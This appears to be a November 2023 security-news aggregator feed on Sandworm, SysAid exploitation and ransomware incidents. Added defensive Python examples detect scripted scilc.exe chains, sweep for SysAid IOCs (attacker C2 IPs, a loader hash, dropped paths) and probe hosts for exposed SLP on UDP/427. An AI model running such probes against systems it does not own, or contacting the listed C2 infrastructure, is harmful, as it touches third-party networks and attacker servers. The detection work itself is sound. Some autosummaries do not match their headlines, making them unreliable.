The notorious Russian hackers known as Sandworm targeted an electrical substation in Ukraine last year, causing a brief power outage in October 2022. The findings come from Google’s Mandiant, which described the hack as a "multi-event cyber attack" leveraging a novel technique for impacting industrial control systems (ICS). "The actor first used OT-level living-off-the-land (LotL) techniques to "

            Autosummary: "


            McLaren Health Care revealed that a data breach impacted 2.2 million people

            financial
            2023-11-10 https://securityaffairs.com/154014/data-breach/mclaren-health-care-data-breach.html

            McLaren Health Care (McLaren) experienced a data breach that compromised the sensitive personal information of approximately 2.2 million individuals. McLaren Health Care (McLaren) disclosed a data breach that occurred between late July and August. The security breach exposed the sensitive personal information of 2,192,515 people. McLaren Health Care is a nonprofit health care organization based in […]

            The post McLaren Health Care revealed that a data breach impacted 2.2 million people appeared first on Security Affairs.

            "

Autosummary: McLaren operates 14 hospitals in Michigan, ambulatory surgery centers, imaging centers, a 490-member employed primary and specialty care physician network, commercial and Medicaid HMOs covering more than 732,838 lives in Michigan and Indiana, home health, infusion and hospice providers, pharmacy services, a clinical laboratory network and a wholly owned medical malpractice insurance company. The BlackCat/ALPHV ransomware gang has been active since November 2021; the list of its victims is long and includes the industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, the gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. "


            Unpacking the challenges of anti-money laundering obligations

            financial
            2023-11-09 https://www.helpnetsecurity.com/2023/11/09/anti-money-laundering-obligations-video/

            When managing anti-money laundering (AML) obligations, many challenger banks turn to basic or unproven in-house risk management solutions. Although these solutions can, in some ways, be innovative, they are often built quickly and lack thorough testing, leading to potential vulnerabilities. In this Help Net Security video, Simon McClive, General Manager of Labyrinth Screening at Ripjar, discusses how compliance requires organizations to devise and implement high-quality processes, and getting it right is non-negotiable. Regulators are rightly … More

            The post Unpacking the challenges of anti-money laundering obligations appeared first on Help Net Security.

            "

            Autosummary: "


            Most cybersecurity investments aren’t used to their full advantage

            ciber
            2023-11-09 https://www.helpnetsecurity.com/2023/11/09/it-infrastructure-security-budgets/

            While organizations are slashing budgets across other departments, IT and security budgets are growing to address evolving IT infrastructure and rising threats from new tactics such as AI-based attacks, according to Axonius. Budget growth in IT and security In fact, 74% of IT and security decision makers said their organization’s IT or security budget increased compared to the year prior, and 63% said their organization’s IT or security team headcount increased. However, for those that … More

            The post Most cybersecurity investments aren’t used to their full advantage appeared first on Help Net Security.

            "

            Autosummary: Budget growth in IT and security In fact, 74% of IT and security decision makers said their organization’s IT or security budget increased compared to the year prior, and 63% said their organization’s IT or security team headcount increased. "


            CISA Alerts: High-Severity SLP Vulnerability Now Under Active Exploitation

            exploits
            2023-11-09 https://thehackernews.com/2023/11/cisa-alerts-high-severity-slp.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a high-severity flaw in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-29552 (CVSS score: 7.5), the issue relates to a denial-of-service (DoS) vulnerability that could be weaponized to launch massive DoS "

            Autosummary: "


            Russian hackers switch to LOTL technique to cause power outage

            rusia-ucrania
            2023-11-09 https://www.bleepingcomputer.com/news/security/russian-hackers-switch-to-lotl-technique-to-cause-power-outage/
            Russian state hackers have evolved their methods for breaching industrial control systems by adopting living-off-the-land techniques that enable reaching the final stage of the attack quicker and with less resources [...] "

Autosummary: Inside the ISO file there were at least the following three files: “lun.vbs”, which runs n.bat; “n.bat”, which likely runs the native scilc.exe utility; and “s1.txt”, which likely contains the unauthorized MicroSCADA commands. The researcher found that the lun.vbs script had a September 23 timestamp, which suggests that the hackers had about two months to develop their OT capability since the initial access stage. "
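The article describes the chain as script host, batch file, then the native scilc.exe utility. The check below is an added example for this page, not code from Mandiant or BleepingComputer: it walks process ancestry in a set of process-creation events and flags any scilc.exe whose ancestors include a script host or cmd.exe, which is the shape of the lun.vbs → n.bat → scilc.exe chain the entry names. The event records, field names, and the benign parent process name are constructed for the example; map the fields to whatever your EDR or Sysmon Event ID 1 exports.

```python
"""Process-ancestry check for the MicroSCADA living-off-the-land chain.

Added example, not from the article or Mandiant. Encodes only what the
entry states: a VBS script launches a batch file which launches the
native scilc.exe utility. Events, field names and the benign parent
name (operator_console.exe) are constructed for the example.
"""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str       # executable file name, lowercase
    cmdline: str


# Ancestors that indicate scilc.exe was driven from a script rather than
# by the operator console (cscript.exe added on the assumption it is
# interchangeable with wscript.exe for this purpose).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
TARGET = "scilc.exe"


def ancestry(events, pid):
    """Return [process, parent, grandparent, ...] for pid, cycle-safe."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_suspicious_scilc(events):
    """(pid, [image names from scilc.exe up to the root]) for every
    scilc.exe with a script host somewhere above it."""
    hits = []
    for e in events:
        if e.image != TARGET:
            continue
        images = [c.image for c in ancestry(events, e.pid)]
        if any(img in SCRIPT_HOSTS for img in images[1:]):
            hits.append((e.pid, images))
    return hits


# Constructed sample: one scripted chain and one benign console launch.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", r"wscript.exe D:\lun.vbs"),
    ProcEvent(300, 200, "cmd.exe", r"cmd.exe /c n.bat"),
    ProcEvent(400, 300, "scilc.exe", "scilc.exe"),
    ProcEvent(600, 1, "operator_console.exe", "operator_console.exe"),
    ProcEvent(500, 600, "scilc.exe", "scilc.exe"),
]

if __name__ == "__main__":
    for pid, chain in find_suspicious_scilc(SAMPLE_EVENTS):
        print(f"pid {pid}: {' <- '.join(chain)}")
```

The benign scilc.exe (pid 500) is not reported because nothing above it is a script host; the scripted one is reported with its full chain so an analyst can see which script and batch file started it.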


            The largest Russian bank Sberbank hit by a massive DDoS attack

            financial rusia-ucrania
            2023-11-09 https://securityaffairs.com/153888/hacking/russian-bank-sberbank-massive-ddos-attack.html

            The largest and oldest bank in Russia Sberbank faced the record-breaking DDoS attack that reached 1 million RPS. Sberbank , the Russian banking and financial services giant, announced that it was recently hit by a record-breaking distributed denial of service (DDoS) attack that reached 1 million RPS. After the invasion of Ukraine, most Russian organizations […]

            The post The largest Russian bank Sberbank hit by a massive DDoS attack appeared first on Security Affairs.

            "

Autosummary: That is, some new, very qualified criminals appeared on the market who began to systematically attack the largest Russian resources,” Gref said. He added that Sberbank faces about ten attacks per month, but threat actors have never breached the bank’s systems. "


            Suspects held over alleged Hezbollah plot in Brazil

            latam
            2023-11-09 https://www.bbc.co.uk/news/world-latin-america-67367483?at_medium=RSS&at_campaign=KARANGA
            Brazilian authorities made two arrests and carried out raids in key cities including São Paulo and Brasília. "

            Autosummary: "


            Microsoft: SysAid zero-day flaw exploited in Clop ransomware attacks

            exploits ransomware
            2023-11-09 https://www.bleepingcomputer.com/news/security/microsoft-sysaid-zero-day-flaw-exploited-in-clop-ransomware-attacks/
            Threat actors are exploiting a zero-day vulnerability in the service management software SysAid to gain access to corporate servers for data theft and to deploy Clop ransomware. [...] "

Autosummary: SysAid’s report provides indicators of compromise that could help detect or prevent the intrusion, consisting of filenames and hashes, IP addresses, file paths used in the attack, and commands the threat actor used to download malware or to delete evidence of initial access. "


            Update now! SysAid vulnerability is actively being exploited by ransomware affiliate

            exploits ransomware
            2023-11-09 https://www.malwarebytes.com/blog/news/2023/11/update-now-sysaid-vulnerability-is-actively-being-exploited-by-ransomware-affiliate
            A SysAid vulnerability is actively being exploited by a ransomware affiliate. "

Autosummary: IOCs. File: b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d (malicious loader). IPs: 81.19.138.52 (GraceWire Loader C2), 45.182.189.100 (GraceWire Loader C2), 179.60.150.34 (Cobalt Strike C2), 45.155.37.105 (Meshagent remote admin tool C2). Malwarebytes blocks the Cobalt Strike C2 179.60.150.34. File paths: C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe; C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war; C:\Program Files\SysAidServer\tomcat\webapps\leave. How to avoid ransomware: block common forms of entry. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "
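The IOCs above are only useful if they are actually swept across the estate. The sweep below is an added example for this page, not Malwarebytes’ or SysAid’s code: it normalizes Windows paths and hashes so case differences do not hide a hit, then matches file inventory and outbound connection records against the path, hash and C2 IP indicators the entry lists. The inventory and connection records are constructed; the SysAid install root is assumed to be the default one the IOC paths use.

```python
"""Sweep host and network inventory against the SysAid (CVE-2023-47246)
IOCs quoted in the entry above.

Added example, not code from Malwarebytes or SysAid. IOC values are the
ones the entry lists; the inventory records below are constructed.
"""
import ntpath

IOC_PATHS = {
    r"C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe",
    r"C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war",
    r"C:\Program Files\SysAidServer\tomcat\webapps\leave",
}
IOC_SHA256 = {
    "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d": "malicious loader",
}
IOC_IPS = {
    "81.19.138.52": "GraceWire Loader C2",
    "45.182.189.100": "GraceWire Loader C2",
    "179.60.150.34": "Cobalt Strike C2",
    "45.155.37.105": "Meshagent remote admin tool C2",
}


def normalize(path: str) -> str:
    """Windows paths are case-insensitive; compare them normalized."""
    return ntpath.normpath(path).lower()


_IOC_PATHS_NORM = {normalize(p) for p in IOC_PATHS}


def match_files(files):
    """files: [{"path": str, "sha256": str}] -> (kind, path, label) findings."""
    out = []
    for rec in files:
        if normalize(rec["path"]) in _IOC_PATHS_NORM:
            out.append(("path", rec["path"], "SysAid IOC path"))
        label = IOC_SHA256.get(rec.get("sha256", "").lower())
        if label:
            out.append(("sha256", rec["path"], label))
    return out


def match_connections(conns):
    """conns: [{"dst_ip": str, "dst_port": int}] -> (kind, ip, label) findings."""
    return [("ip", c["dst_ip"], IOC_IPS[c["dst_ip"]])
            for c in conns if c["dst_ip"] in IOC_IPS]


def sweep(files, conns):
    return match_files(files) + match_connections(conns)


# Constructed sample inventory: a dropped WAR with the loader hash (mixed
# case path and hash), the user.exe path, a benign WAR, and two connections.
SAMPLE_FILES = [
    {"path": r"C:\PROGRAM FILES\SysAidServer\tomcat\webapps\usersfiles.war",
     "sha256": "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D"},
    {"path": r"C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe",
     "sha256": "0" * 64},
    {"path": r"C:\Program Files\SysAidServer\tomcat\webapps\benign.war",
     "sha256": "1" * 64},
]
SAMPLE_CONNS = [
    {"dst_ip": "179.60.150.34", "dst_port": 443},
    {"dst_ip": "8.8.8.8", "dst_port": 53},
]

if __name__ == "__main__":
    for kind, value, label in sweep(SAMPLE_FILES, SAMPLE_CONNS):
        print(f"{kind:7} {label:32} {value}")
```

A hit on the hash or the C2 addresses is strong evidence of the intrusion; a hit on the path alone still warrants pulling the file, since the entry says those paths were used in the attack.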


            MOVEit hackers leverage new zero-day bug to breach organizations (CVE-2023-47246)

            exploits
            2023-11-09 https://www.helpnetsecurity.com/2023/11/09/exploited-cve-2023-47246/

A critical zero-day vulnerability (CVE-2023-47246) in the SysAid IT support and management software solution is being exploited by Lace Tempest, a ransomware affiliate known for deploying Cl0p ransomware. Lace Tempest has previously exploited a zero-day vulnerability (CVE-2023-34362) in Progress Software’s MOVEit Transfer installations to steal data from many enterprises and public sector organizations. The group has also similarly leveraged zero-days in the Accellion file transfer appliance and Fortra’s GoAnywhere file transfer solution. CVE-2023-47246 exploited The … More

            The post MOVEit hackers leverage new zero-day bug to breach organizations (CVE-2023-47246) appeared first on Help Net Security.

            "

            Autosummary: The latter injected the GraceWire trojan into various processes (spoolsv.exe, msiexec.exe and svchost.exe) “This is typically followed by human-operated activity, including lateral movement, data theft, and ransomware deployment,” the Microsoft Threat Intelligence team noted. "


            Open-source vulnerability disclosure: Exploitable weak spots

            exploits
            2023-11-09 https://www.helpnetsecurity.com/2023/11/09/open-source-vulnerability-disclosure-process-flaws/

            Flaws in the vulnerability disclosure process of open-source projects could be exploited by attackers to harvest the information needed to launch attacks before patches are made available, Aqua Security researchers worry. The risk arises from “half-day” and “0.75-day” vulnerabilities “Half-day” vulnerabilities are known to the maintainer and information about them is publicly exposed on GitHub or the National Vulnerability Database, but there’s still no official fix. “0.75-day” vulnerabilities have an official fix, but not a … More

            The post Open-source vulnerability disclosure: Exploitable weak spots appeared first on Help Net Security.

            "

            Autosummary: The risk arises from “half-day” and “0.75-day” vulnerabilities “Half-day” vulnerabilities are known to the maintainer and information about them is publicly exposed on GitHub or the National Vulnerability Database, but there’s still no official fix. "


            CISA adds SLP flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-11-09 https://securityaffairs.com/153915/security/cisa-adds-slp-flaw-to-its-known-exploited-vulnerabilities-catalog.html

            US CISA added the vulnerability CVE-2023-29552 in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2023-29552 (CVSS score: 7.5) in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities catalog. The Service Location Protocol (SLP) is a legacy service discovery protocol that allows computers and other devices to […]

            The post CISA adds SLP flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

Autosummary: Most of the vulnerable SLP instances are in the U.S., the U.K., Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain. "
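Both SLP entries above (the CISA KEV alert and this one) say the same practical thing: SLP is a legacy discovery protocol that should not answer from the internet, and the exposed instances are what the DoS vector in CVE-2023-29552 abuses. The first question for a defender is therefore whether any host answers SLP on UDP/427 from outside at all. The code below is an added example for this page, not from CISA or the articles: it builds a plain SLPv2 Service Request (the message layout follows RFC 2608; the host list and the sample reply are constructed) and parses whatever comes back. It is an inventory check, not an exploit, and it sends one ordinary request per host.

```python
"""Build and parse SLPv2 (RFC 2608) messages to check whether a host
answers Service Requests on UDP/427.

Added example, not code from CISA or the articles. Message layout per
RFC 2608; sample reply is constructed. Any reply at all from an
internet-facing host means SLP is exposed there.
"""
import socket
import struct

SLP_PORT = 427
SLP_VERSION = 2
SRVRQST, SRVRPLY, DAADVERT, SAADVERT = 1, 2, 8, 11   # function IDs used here


def _slp_string(s: str) -> bytes:
    """Length-prefixed string field: 16-bit length, then UTF-8 bytes."""
    data = s.encode("utf-8")
    return struct.pack("!H", len(data)) + data


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from("!H", buf, off)
    return buf[off + 2: off + 2 + n].decode("utf-8"), off + 2 + n


def _header(function_id: int, xid: int, body: bytes, lang: str = "en") -> bytes:
    """Common header: version, function, 24-bit length, flags,
    24-bit next-extension offset, XID, language tag, then the body."""
    lang_field = _slp_string(lang)
    total = 12 + len(lang_field) + len(body)
    return (struct.pack("!BB", SLP_VERSION, function_id)
            + total.to_bytes(3, "big")
            + struct.pack("!H", 0)            # flags: none set
            + (0).to_bytes(3, "big")          # no extensions
            + struct.pack("!H", xid)
            + lang_field + body)


def build_srvrqst(xid: int, service_type: str = "service:service-agent",
                  scope: str = "DEFAULT") -> bytes:
    """SrvRqst asking for service agents in the given scope."""
    body = (_slp_string("")            # PRList: no previous responders
            + _slp_string(service_type)
            + _slp_string(scope)
            + _slp_string("")          # predicate
            + _slp_string(""))         # SLP SPI
    return _header(SRVRQST, xid, body)


def build_srvrply(xid: int, urls, lifetime: int = 65535) -> bytes:
    """SrvRply with URL entries and no auth blocks; used here only to
    construct a sample reply for the example."""
    body = struct.pack("!HH", 0, len(urls))          # error code, count
    for url in urls:
        body += struct.pack("!BH", 0, lifetime) + _slp_string(url) + b"\x00"
    return _header(SRVRPLY, xid, body)


def parse_header(data: bytes) -> dict:
    if len(data) < 14:
        raise ValueError("short SLP message")
    version, function_id = data[0], data[1]
    length = int.from_bytes(data[2:5], "big")
    if version != SLP_VERSION or length > len(data):
        raise ValueError("not a well-formed SLPv2 message")
    (flags,) = struct.unpack_from("!H", data, 5)
    (xid,) = struct.unpack_from("!H", data, 10)
    lang, body_off = _read_string(data, 12)
    return {"function": function_id, "length": length, "flags": flags,
            "xid": xid, "lang": lang, "body": data[body_off:length]}


def parse_srvrply(data: bytes) -> dict:
    hdr = parse_header(data)
    if hdr["function"] != SRVRPLY:
        raise ValueError("not a SrvRply")
    body = hdr["body"]
    error_code, count = struct.unpack_from("!HH", body, 0)
    off, urls = 4, []
    for _ in range(count):
        off += 3                                  # reserved byte + lifetime
        url, off = _read_string(body, off)
        nauth, off = body[off], off + 1
        if nauth:
            raise ValueError("authentication blocks not handled here")
        urls.append(url)
    return {"xid": hdr["xid"], "error_code": error_code, "urls": urls}


def probe_slp(host: str, timeout: float = 2.0, xid: int = 0x4242):
    """Function ID of the first matching SLP reply from host, else None."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_srvrqst(xid), (host, SLP_PORT))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    hdr = parse_header(data)
    return hdr["function"] if hdr["xid"] == xid else None


if __name__ == "__main__":
    for host in ["192.0.2.10", "192.0.2.11"]:   # constructed host list
        print(host, probe_slp(host))
```

Run it from an external vantage point against your own address space; a SrvRply, SAAdvert or DAAdvert from any host is the finding. The XID check in probe_slp discards unrelated datagrams on the same socket.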


            Industrial and Commercial Bank of China hit by ransomware attack

            financial exploits ransomware industry
            2023-11-09 https://www.bleepingcomputer.com/news/security/industrial-and-commercial-bank-of-china-hit-by-ransomware-attack/
            The Industrial & Commercial Bank of China (ICBC) is restoring systems and services following a ransomware attack that disrupted the U.S. Treasury market, causing equities clearing issues. [...] "

Autosummary: ICBC is China’s largest bank and the largest commercial bank in the world by revenue, with revenue of $214.7 billion and profits of $53.5 billion reported in 2022, according to Fortune. "


            Zero-Day Alert: Lace Tempest Exploits SysAid IT Support Software Vulnerability

            exploits
            2023-11-09 https://thehackernews.com/2023/11/zero-day-alert-lace-tempest-exploits.html
            The threat actor known as Lace Tempest has been linked to the exploitation of a zero-day flaw in SysAid IT support software in limited attacks, according to new findings from Microsoft. Lace Tempest, which is known for distributing the Cl0p ransomware, has in the past leveraged zero-day flaws in MOVEit Transfer and PaperCut servers. The issue, tracked as CVE-2023-47246, concerns a path traversal "

            Autosummary: "As of June 2023, the Silent Ransom Group (SRG), also called Luna Moth, conducted callback phishing data theft and extortion attacks by sending victims a phone number in a phishing attempt, usually relating to pending charges on the victims" account," FBI said. "


            Russian Sandworm disrupts power in Ukraine with a new OT attack

            rusia-ucrania
            2023-11-09 https://securityaffairs.com/153920/apt/russian-sandworm-ot-attacks.html

            Mandiant reported that Russia-linked Sandworm APT used a novel OT attack to cause power outages during mass missile strikes on Ukraine. Mandiant researchers reported that Russia-linked APT group Sandworm employed new operational technology (OT) attacks that caused power outages while the Russian army was conducting mass missile strikes on critical infrastructure in Ukraine in October. […]

            The post Russian Sandworm disrupts power in Ukraine with a new OT attack appeared first on Security Affairs.

            "

Autosummary: In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000; it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST). "


Footballer Luis Díaz’s father freed by Colombian guerrillas

            latam
            2023-11-09 https://www.bbc.co.uk/news/world-latin-america-67372903?at_medium=RSS&at_campaign=KARANGA
            The father of the Liverpool footballer was handed over to UN and Catholic Church officials. "

            Autosummary: "


            Kyocera AVX says ransomware attack impacted 39,000 individuals

            exploits ransomware
            2023-11-09 https://www.bleepingcomputer.com/news/security/kyocera-avx-says-ransomware-attack-impacted-39-000-individuals/
            Kyocera AVX Components Corporation (KAVX) is sending notices of a data breach exposing personal information of 39,111 individuals following a ransomware attack. [...] "

            Autosummary: “On March 30, 2023, KAVX experienced a cybersecurity incident affecting servers located in Greenville and Myrtle Beach, South Carolina, USA, which resulted in the encryption of a limited number of systems and temporary disruption of certain services,” reads the notice. "


            World’s largest commercial bank ICBC confirms ransomware attack

            financial exploits ransomware
            2023-11-09 https://www.bleepingcomputer.com/news/security/worlds-largest-commercial-bank-icbc-confirms-ransomware-attack/
            The Industrial & Commercial Bank of China (ICBC) is restoring systems and services following a ransomware attack that disrupted the U.S. Treasury market, causing equities clearing issues. [...] "

            Autosummary: "On November 8, 2023, U.S. Eastern Time (November 9, 2023, Beijing Time), ICBC Financial Services (FS) experienced a ransomware attack that resulted in disruption to certain FS systems. "


            Unlucky Kamran: Android malware spying on Urdu-speaking residents of Gilgit-Baltistan

            exploits
            2023-11-09 https://www.welivesecurity.com/en/eset-research/unlucky-kamran-android-malware-spying-urdu-speaking-residents-gilgit-baltistan/
            ESET researchers discovered Kamran, previously unknown malware, which spies on Urdu-speaking readers of Hunza News "

Autosummary: Malicious app’s initial interface. If the abovementioned permissions are granted, the Kamran spyware automatically gathers sensitive user data, including: SMS messages, contacts list, call logs, calendar events, device location, list of installed apps, received SMS messages, device info, and images. Interestingly, Kamran identifies accessible image files on the device (as depicted in Figure 8), obtains the file paths for these images, and stores this data in an images_db database, as demonstrated in Figure 9. Upon launching, Kamran prompts the user to grant permissions for accessing various data stored on the victim’s device, such as contacts, calendar events, call logs, location information, device files, SMS messages, and images. If accepted, it gathers data about contacts, calendar events, call logs, location information, device files, SMS messages, images, etc. The region, with a population of around 1.5 million, is famous for the presence of some of the highest mountains globally, hosting five of the esteemed “eight-thousanders” (mountains that peak at more than 8,000 meters above sea level), most notably K2, and is therefore frequently visited by international tourists, trekkers, and mountaineers. Prior to 2022, this online newspaper also used another domain, hunzanews.com, as indicated in the page transparency information on the site’s Facebook page (see Figure 2) and the Internet Archive records of hunzanews.com. Internet Archive data also shows that hunzanews.com had been delivering news since 2013; therefore, for around five years, this online newspaper was publishing articles via two websites: hunzanews.net and hunzanews.com. Hunza News after redesign with no option to download an app. Based on Internet Archive records, it is evident that at least since March 21st, 2023, the website reintroduced the option for users to download an Android app, accessible via the DOWNLOAD APP button, as depicted in Figure 5. "


            The 3 key stages of ransomware attacks and useful indicators of compromise

            exploits ransomware
            2023-11-08 https://www.helpnetsecurity.com/2023/11/08/ransomware-attack-stages/

            For SOC teams to be able to defend their organization against ransomware attacks, they need to have the right security toolset, but also an understanding of the three primary ransomware attack stages. In this article, we will dive into those key stages, look at how they unfold and what signs indicate an attack, and review what can be done to mitigate any damage. When it comes to ransomware attacks, most of the time there isn’t … More

            The post The 3 key stages of ransomware attacks and useful indicators of compromise appeared first on Help Net Security.

            "

Autosummary: It requires identifying strange or out-of-the-ordinary user and entity behavior across the network, such as accessing files outside their scope of work, installing external non-company-approved software on the network, looking at DNS queries, and more. Other indicators of compromise include: accessing website infrastructure, looking for specific DNS addresses, and connecting to external cloud services like Dropbox. Again, these signs can be difficult to distinguish because these actions may look like they are being made by someone who has authorized access to sensitive data, but is actually a hacker imitating them on the network. Once hackers gain access to a database with a lot of sensitive information or have control over the network, attackers will begin deploying software like PuTTY across different areas, further establishing their foothold and creating backups for their ransomware in case they are detected. "


            Uphold Linux systems’ performance and availability in Azure

            Linux
            2023-11-08 https://www.helpnetsecurity.com/2023/11/08/cis-azure-monitor-linux/

            Cloud computing carries many benefits for your business… as long as you can ensure the performance and availability of your cloud environments. Let’s take the following three cloud computing benefits as examples. Rapidly scale cloud services: In the absence of performance and availability, you can’t reliably scale your cloud computing services to fit your needs. This means that your organization could miss out on taking advantage of certain resources, or it might need to pay … More

            The post Uphold Linux systems’ performance and availability in Azure appeared first on Help Net Security.

            "

Autosummary: With this testing period over, Azure Monitor Agent is now validated for successful deployment and overall functionality (e2e data flow for all data types) on images for the following CIS Benchmarks: CIS Red Hat Enterprise Linux 7 Benchmark Level 1 and Level 2, CIS Red Hat Enterprise Linux 8 Benchmark Level 1 and Level 2, CIS Ubuntu Linux 20.04 LTS Benchmark Level 1, CIS CentOS Linux 7 Benchmark Level 1, CIS Debian Linux 10 Benchmark Level 1, and CIS Oracle Linux 8 Benchmark Level 1. What’s more, the Azure team has integrated CIS Hardened Images into the pre-release validation process for continual re-validation when new AMA versions become available. "


Russian-speaking threat actor “farnetwork” linked to 5 ransomware gangs

            exploits ransomware rusia-ucrania
            2023-11-08 https://www.bleepingcomputer.com/news/security/russian-speaking-threat-actor-farnetwork-linked-to-5-ransomware-gangs/
The operator of the Nokoyawa ransomware-as-a-service (RaaS), a threat actor known as “farnetwork”, built experience over the years by helping the JSWORM, Nefilim, Karma, and Nemty affiliate programs with malware development and operation management. [...] "

            Autosummary: According to a report Group-IB shared with BleepingComputer, the threat actor has several usernames (e.g. farnetworkl, jingo, jsworm, razvrat, piparkuka, and farnetworkitand) and has been active on multiple Russian-speaking hacker forums trying to recruit affiliates for various ransomware operations. "


            Cancer treatments cancelled after Canadian hospitals hit by ransomware attack

            financial exploits ransomware
            2023-11-08 https://www.bitdefender.com/blog/hotforsecurity/cancer-treatments-cancelled-after-canadian-hospitals-hit-by-ransomware-attack/
            A ransomware attack impacting five hospitals in southwestern Ontario, Canada, has seen hackers gain access to a database containing 5.6 million patient visits, and the social insurance numbers of over 1400 employees. Read more in my article on the Hot for Security blog.

            Autosummary: The attack against IT service provider TransForm, which took place on October 23, resulted in outages in IT systems at Windsor Regional Hospital, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, Bluewater Health and Chatham-Kent Health Alliance, leaving patients facing appointment delays and cancelled surgeries.


            Experts Expose Farnetwork's Ransomware-as-a-Service Business Model

            exploits ransomware
            2023-11-08 https://thehackernews.com/2023/11/experts-expose-farnetworks-ransomware.html
            Cybersecurity researchers have unmasked a prolific threat actor known as farnetwork, who has been linked to five different ransomware-as-a-service (RaaS) programs over the past four years in various capacities. Singapore-headquartered Group-IB, which attempted to infiltrate a private RaaS program that uses the Nokoyawa ransomware strain, said it underwent a "job interview" process with the

            Autosummary: "Throughout the threat actor's cybercriminal career, which began in 2019, farnetwork has been involved in several connected ransomware projects, including JSWORM, Nefilim, Karma, and Nemty, as part of which they helped develop ransomware and manage the RaaS programs before launching their own RaaS program based on Nokoyawa ransomware," Nikolay Kichatov, threat intelligence analyst at Group-IB, said.


            North Korea-linked APT BlueNoroff used new macOS malware ObjCShellz

            exploits
            2023-11-08 https://securityaffairs.com/153842/apt/bluenoroff-apt-objcshellz-macos-malware.html

            The North Korea-linked APT BlueNoroff used a new macOS malware strain dubbed ObjCShellz, Jamf Threat Labs reported. Researchers from Jamf Threat Labs discovered a new macOS malware strain dubbed ObjCShellz and attributed it to North Korea-linked APT BlueNoroff. The experts noticed that the ObjCShellz malware shares similarities with the RustBucket malware campaign associated with the BlueNoroff APT […]

            The post North Korea-linked APT BlueNoroff used new macOS malware ObjCShellz appeared first on Security Affairs.

            Autosummary: North Korea-linked APT BlueNoroff used new macOS malware ObjCShellz. Pierluigi Paganini, November 08, 2023. The North Korea-linked APT BlueNoroff used a new macOS malware strain dubbed ObjCShellz, Jamf Threat Labs reported.


            Kasten K10 V6.5 improves ransomware and data protection for Kubernetes environments

            exploits ransomware
            2023-11-08 https://www.helpnetsecurity.com/2023/11/08/kasten-k10-v6-5/

            Kasten by Veeam has announced the release of its new Kasten K10 V6.5 platform for Kubernetes. The new release introduces trusted container environments, enhanced ransomware protection and data protection support for large-scale Kubernetes environments. As part of the new cloud native security innovations in Kasten K10 V6.5, organizations now have access to ransomware protection advances that allow for integrations with SIEM (Datadog) to proactively detect security attacks along with an extended audit log backend that … More

            The post Kasten K10 V6.5 improves ransomware and data protection for Kubernetes environments appeared first on Help Net Security.

            Autosummary: Additionally, support for Iron Bank, Platform One’s hardened federal container registry, is now provided to ensure application and data security against a variety of threat factors and to guarantee that organizations can comply with regulatory and legal fiats. “Kasten by Veeam’s new security advancements put it at feature parity, and in some cases even above what traditional data protection products can currently do,” said Johnny Yu, research manager at IDC.


            SUSE boosts cloud native portfolio to enhance customer productivity

            Linux
            2023-11-08 https://www.helpnetsecurity.com/2023/11/08/suse-rancher-prime-2-0/

            SUSE released Rancher Prime 2.0, enhancing customers’ ability to manage heterogeneous, multi-cloud Kubernetes deployments securely and at scale. SUSE also revealed updates to Rancher community edition, SLE Micro 5.5 and the future of SUSE Edge. The latest updates continue to meet the diverse needs of the developer while furthering SUSE’s mission to provide choice. “With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for … More

            The post SUSE boosts cloud native portfolio to enhance customer productivity appeared first on Help Net Security.

            Autosummary: “With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for their entire infrastructure including data center, multiple clouds, and the Edge,” said Peter Smails, general manager of Enterprise Container Management, SUSE. Helping customers get more value from Kubernetes with Rancher Prime 2.0: Interoperable by design, Rancher Prime 2.0, SUSE’s commercial enterprise subscription, delivers even more value and support for customers. Tighter portfolio integration and new UI extensions (UIE): UI extensions simplify operations and enhance user productivity by building the functionality of SUSE and third-party tools directly into the Rancher Prime UI.


            Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

            exploits
            2023-11-08 https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html
